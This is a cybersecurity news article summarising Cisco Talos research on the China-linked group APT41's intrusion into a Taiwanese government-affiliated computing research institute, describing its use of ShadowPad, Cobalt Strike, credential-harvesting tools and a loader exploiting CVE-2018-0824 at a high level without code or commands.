China-linked advanced persistent threat group APT41 has reportedly compromised a government-affiliated institute in Taiwan focused on research in advanced computing and related technologies. The intrusion, which began in July 2023, saw the threat actor gaining initial access to the victim environment through unidentified means. Subsequently, APT41 deployed a range of malware tools, including the notorious ShadowPad remote access Trojan, the Cobalt Strike post-compromise tool, and a custom loader for injecting malware using a 2018 Windows remote code execution vulnerability (CVE-2018-0824).
APT41 is a designation used by various security vendors to monitor a loose coalition of China-centric threat groups known for engaging in cyber espionage and financially motivated attacks worldwide since 2012. Notable members of the group include Wicked Panda, Winnti, Barium, and SuckFly, who have targeted organizations in the United States and several other countries, pilfering trade secrets, intellectual property, and other sensitive data in recent years.
Recent reports from Mandiant indicate that APT41 has expanded its targets to include global shipping and logistics companies, as well as organizations in the technology, entertainment, and automotive sectors. Despite the U.S. government indicting several members of APT41 in 2020, the group’s operations have not slowed down.
The academic research conducted by the Taiwan-based institute proved to be a valuable cyber target for APT41, as discovered by researchers at Cisco Talos. The intrusion was detected during an investigation into abnormal activities involving attempted downloads and executions of PowerShell scripts in the institute’s network environment. According to Talos researchers Joey Chen, Ashley Shen, and Vitor Ventura, the nature of the research work conducted at the institute made it an attractive target for threat actors seeking to obtain proprietary and sensitive technologies.
ShadowPad, a malware first uncovered in NetSarang Computer’s Xmanager source code back in 2017, was one of the tools used by APT41 in the attack on the Taiwan research institute. Initially believed to be exclusively utilized by APT41, ShadowPad has since been associated with multiple China-linked threat groups involved in cyber espionage campaigns and software supply chain attacks. In the Taiwan incident, APT41 deployed two different ShadowPad versions using distinct techniques for malicious activities within the compromised environment.
The attackers utilized ShadowPad to carry out commands mapping the victim network, gathering host data, and searching for other exploitable systems on the network. Additionally, the threat actors harvested passwords and user credentials stored in web browsers using tools like Mimikatz and WebBrowserPassView. As part of their attack strategy, APT41 also leveraged the Cobalt Strike post-compromise tool on the victim network, employing a cloned loader from a GitHub project to evade antivirus detection.
The use of steganography to conceal the Cobalt Strike beacon shellcode within an image further highlighted the sophisticated tactics employed by APT41 in their cyber campaign. The researchers at Cisco Talos observed various commands and techniques used by the threat actors to extract valuable information from compromised systems, showcasing the extent of the intrusion and the group’s capabilities in stealth and persistence.
Overall, the compromise of the Taiwan research institute by APT41 underscores the ongoing threat posed by advanced persistent threat groups to organizations worldwide. The incident serves as a reminder of the importance of cybersecurity measures and vigilance to defend against sophisticated cyber threats targeting valuable intellectual property and proprietary technologies.